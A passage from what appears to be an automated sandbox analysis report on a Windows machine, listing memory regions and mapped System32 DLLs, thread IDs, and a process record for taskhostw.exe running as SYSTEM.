"ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5474 start_va = 0x2140000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 5475 start_va = 0x7ff8f5b50000 end_va = 0x7ff8f5b60fff monitored = 0 entry_point = 0x7ff8f5b57ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 5476 start_va = 0x7ff8f5b20000 end_va = 0x7ff8f5b44fff monitored = 0 entry_point = 0x7ff8f5b32f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 5477 start_va = 0x7ff8f5ae0000 end_va = 0x7ff8f5b18fff monitored = 0 entry_point = 0x7ff8f5ae9c90 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 5478 start_va = 0x7ff8f5ac0000 end_va = 0x7ff8f5ad0fff monitored = 0 entry_point = 0x7ff8f5ac3e10 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 5479 start_va = 0x7ff8f6d50000 end_va = 0x7ff8f70d1fff monitored = 0 entry_point = 0x7ff8f6da1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 5480 start_va = 0x7ff8faef0000 end_va = 0x7ff8faf13fff monitored = 0 entry_point = 0x7ff8faef3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 5481 start_va = 0x7ff8f5a60000 end_va = 0x7ff8f5b10fff monitored = 0 entry_point = 0x7ff8f5ad88b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 5482 start_va = 0x7ff8fbd80000 end_va = 0x7ff8fbda8fff monitored = 0 entry_point = 0x7ff8fbd94530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5483 start_va = 0x7ff8f5a40000 end_va = 0x7ff8f5a51fff monitored = 0 entry_point = 0x7ff8f5a49260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 5484 start_va = 0x7ff8f5990000 end_va = 0x7ff8f5a3dfff monitored = 0 entry_point = 0x7ff8f59a80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 5485 start_va = 0x2240000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5486 start_va = 0x7ff8f5980000 end_va = 0x7ff8f598bfff monitored = 0 entry_point = 0x7ff8f5982830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 5487 start_va = 0x7ff8f5830000 end_va = 0x7ff8f5870fff monitored = 0 entry_point = 0x7ff8f5847eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 5488 start_va = 0x7ff8f5880000 end_va = 0x7ff8f597bfff monitored = 0 entry_point = 0x7ff8f58b6df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 5489 start_va = 0x7ff8fbd60000 end_va = 0x7ff8fbd78fff monitored = 0 entry_point = 0x7ff8fbd65e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 5490 start_va = 0x1300000 end_va = 0x14d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 5491 start_va = 0x14d0000 end_va = 0x14d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 5492 start_va = 0x14f0000 end_va = 0x14f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 5493 start_va = 0x2340000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 5494 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 5495 start_va = 0x7ff8fb190000 end_va = 0x7ff8fb1d8fff monitored = 0 entry_point = 0x7ff8fb19a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 5496 start_va = 0x7ff8f5810000 end_va = 0x7ff8f5820fff monitored = 0 entry_point = 0x7ff8f5813320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 5497 start_va = 0x7ff8fbbd0000 end_va = 0x7ff8fbbfcfff monitored = 0 entry_point = 0x7ff8fbbe9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 5498 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5499 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5500 start_va = 0x880000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 5501 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 5502 start_va = 0x7ff8f5780000 end_va = 0x7ff8f57edfff monitored = 0 entry_point = 0x7ff8f5787f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 5503 start_va = 0x7ff8fb440000 end_va = 0x7ff8fb470fff monitored = 0 entry_point = 0x7ff8fb447d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 5504 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 5505 start_va = 0x1120000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 5506 start_va = 0x1400000 end_va = 0x147ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 5507 start_va = 0x7ff8f55c0000 end_va = 0x7ff8f55d5fff monitored = 0 entry_point = 0x7ff8f55c1b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5508 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 5509 start_va = 0x7ff8f5580000 end_va = 0x7ff8f55aefff monitored = 0 entry_point = 0x7ff8f5588910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 5510 start_va = 0x7ff8f5570000 end_va = 0x7ff8f557cfff monitored = 0 entry_point = 0x7ff8f5572ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 5511 start_va = 0x2340000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 5512 start_va = 0x7ff8fb820000 end_va = 0x7ff8fb87bfff monitored = 0 entry_point = 0x7ff8fb836f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5513 start_va = 0x7ff8f5480000 end_va = 0x7ff8f5565fff monitored = 0 entry_point = 0x7ff8f549cf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 5514 start_va = 0x7ff8f70e0000 end_va = 0x7ff8f7215fff monitored = 0 entry_point = 0x7ff8f710f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 5515 start_va = 0x7ff8f5430000 end_va = 0x7ff8f5471fff monitored = 0 entry_point = 0x7ff8f54327d0 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 5516 start_va = 0x570000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 5517 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 5518 start_va = 0x7ff8f52f0000 end_va = 0x7ff8f531dfff monitored = 0 entry_point = 0x7ff8f52f7550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 5519 start_va = 0x7ff8fba30000 end_va = 0x7ff8fba50fff monitored = 0 entry_point = 0x7ff8fba40250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 5520 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 5521 start_va = 0x7ff8fa630000 end_va = 0x7ff8fa642fff monitored = 0 entry_point = 0x7ff8fa632760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 5522 start_va = 0x7ff8f9b20000 end_va = 0x7ff8f9b27fff monitored = 0 entry_point = 0x7ff8f9b213e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 5523 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 5524 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 5525 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 5526 start_va = 0x7ff8f51f0000 end_va = 0x7ff8f5230fff monitored = 0 entry_point = 0x7ff8f51f4840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 5527 start_va = 0x2700000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 5528 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 5529 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 5532 start_va = 0x7ff8fa5d0000 end_va = 0x7ff8fa5ebfff monitored = 0 entry_point = 0x7ff8fa5d37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5533 start_va = 0x2900000 end_va = 0x297ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 5534 start_va = 0x7ff8f5ff0000 end_va = 0x7ff8f6053fff monitored = 0 entry_point = 0x7ff8f6005ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 5535 start_va = 0x2980000 end_va = 0x2a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 5536 start_va = 0x7ff8f4770000 end_va = 0x7ff8f4809fff monitored = 0 entry_point = 0x7ff8f478ada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 5537 start_va = 0x2140000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 5538 start_va = 0x7ff8fa440000 end_va = 0x7ff8fa5c5fff monitored = 0 entry_point = 0x7ff8fa48d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 5539 start_va = 0x590000 end_va = 0x593fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 5540 start_va = 0x11a0000 end_va = 0x11e4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 5541 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 5542 start_va = 0x2a80000 end_va = 0x2b0dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 5543 start_va = 0x2b10000 end_va = 0x2d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Region: id = 5544 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 5545 start_va = 0x7ff8f56a0000 end_va = 0x7ff8f56affff monitored = 0 entry_point = 0x7ff8f56a2c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 5550 start_va = 0x7ff8f45f0000 end_va = 0x7ff8f45fdfff monitored = 0 entry_point = 0x7ff8f45f1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 5641 start_va = 0x7ff8f4690000 end_va = 0x7ff8f474ffff monitored = 0 entry_point = 0x7ff8f46bfd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 5642 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 5643 start_va = 0x7ff8fa5f0000 end_va = 0x7ff8fa621fff monitored = 0 entry_point = 0x7ff8fa5fb0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 5644 start_va = 0x7ff8f44f0000 end_va = 0x7ff8f458afff monitored = 0 entry_point = 0x7ff8f44f7220 region_type = mapped_file name = "settingsync.dll" filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll") Region: id = 5645 start_va = 0x5c0000 end_va = 0x5c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 5646 start_va = 0x2b10000 end_va = 0x2beffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5659 start_va = 0x7ff8f4490000 end_va = 0x7ff8f44e1fff monitored = 0 entry_point = 0x7ff8f44938e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 5660 start_va = 0x7ff8f4460000 end_va = 0x7ff8f448cfff monitored = 0 entry_point = 0x7ff8f4462290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 5661 start_va = 0x7ff8f4450000 end_va = 0x7ff8f4458fff monitored = 0 entry_point = 0x7ff8f4451ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 5662 start_va = 0x7ff8f51a0000 end_va = 0x7ff8f51d7fff monitored = 0 entry_point = 0x7ff8f51b8cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5663 start_va = 0x7ff8f4440000 end_va = 0x7ff8f444ffff monitored = 0 entry_point = 0x7ff8f4441700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 5664 start_va = 0x7ff8fcc40000 end_va = 0x7ff8fccc5fff monitored = 0 entry_point = 0x7ff8fcc4d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 5665 start_va = 0x7ff8fac70000 end_va = 0x7ff8faca1fff monitored = 0 entry_point = 0x7ff8fac82340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 5666 start_va = 0x7ff8f43c0000 end_va = 0x7ff8f43d0fff monitored = 0 entry_point = 0x7ff8f43c28d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 5681 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 5683 start_va = 0x21c0000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 5684 start_va = 0x7ff8faee0000 end_va = 0x7ff8faeebfff monitored = 0 entry_point = 0x7ff8faee2790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 5686 start_va = 0x7ff8f5e30000 end_va = 0x7ff8f5ea9fff monitored = 0 entry_point = 0x7ff8f5e57630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 5687 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 5688 start_va = 0x7ff8fbdb0000 end_va = 0x7ff8fbe48fff monitored = 0 entry_point = 0x7ff8fbddf4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 5689 start_va = 0x5d0000 end_va = 0x5d1fff monitored = 0 entry_point = 0x5d5630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 5690 start_va = 0x5e0000 end_va = 0x5e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 5692 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 5761 start_va = 0x2e00000 end_va = 0x2e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 5782 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 5940 start_va = 0x5d0000 end_va = 0x5d1fff monitored = 0 entry_point = 0x5d5630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 5941 start_va = 0x5e0000 end_va = 0x5e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 5958 start_va = 0x7ff8f3730000 end_va = 0x7ff8f3773fff monitored = 0 entry_point = 0x7ff8f373c010 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 5959 start_va = 0x7ff8f9f10000 end_va = 0x7ff8f9fcdfff monitored = 0 entry_point = 0x7ff8f9f52d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 5960 start_va = 0x7ff8f8720000 end_va = 0x7ff8f8769fff monitored = 0 entry_point = 0x7ff8f872ac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 5961 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 5962 start_va = 0x2f80000 end_va = 0x307ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 5963 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 5966 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 5973 start_va = 0x7ff8f95c0000 end_va = 0x7ff8f9a52fff monitored = 0 entry_point = 0x7ff8f95cf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Thread: id = 325 os_tid = 0x3ec Thread: id = 326 os_tid = 0x3f0 Thread: id = 327 os_tid = 0x154 Thread: id = 328 os_tid = 0x188 Thread: id = 329 os_tid = 0x1b4 Thread: id = 330 os_tid = 0x210 Thread: id = 331 os_tid = 0x258 Thread: id = 332 os_tid = 0x25c Thread: id = 333 os_tid = 0x254 Thread: id = 334 os_tid = 0x284 Thread: id = 335 os_tid = 0x8 Thread: id = 336 os_tid = 0x30c Thread: id = 337 os_tid = 0x328 Thread: id = 338 os_tid = 0x398 Thread: id = 339 os_tid = 0x3d8 Thread: id = 340 os_tid = 0x2e8 Thread: id = 341 os_tid = 0x1b0 Thread: id = 342 os_tid = 0x154 Thread: id = 343 os_tid = 0x284 Thread: id = 344 os_tid = 0x420 Thread: id = 345 os_tid = 0x424 Thread: id = 346 os_tid = 0x458 Thread: id = 347 os_tid = 0x464 Thread: id = 348 os_tid = 0x480 Thread: id = 349 os_tid = 0x4bc Thread: id = 350 os_tid = 0x4d0 Thread: id = 367 os_tid = 0x588 Thread: id = 369 os_tid = 0x5b0 Thread: id = 373 os_tid = 0x5cc Thread: id = 378 os_tid = 0x58c Thread: id = 400 os_tid = 0x658 Thread: id = 402 os_tid = 0x680 Process: id = "85" image_name = "taskhostw.exe" filename = "c:\\windows\\system32\\taskhostw.exe" page_root = "0x1fa32000" os_pid = "0x4c8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "84" os_parent_pid = "0x3e8" cmd_line = "taskhostw.exe SYSTEM" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d004" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 5647 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5648 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5649 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5650 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 5651 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 5652 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5653 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5654 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5655 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 5656 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 5657 start_va = 0x7ff65f040000 end_va = 0x7ff65f058fff monitored = 0 entry_point = 0x7ff65f0459b0 region_type = mapped_file name = "taskhostw.exe" filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe") Region: id = 5658 start_va = 0x7ff8ff8d0000 end_va = 0x7ff8ffa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = 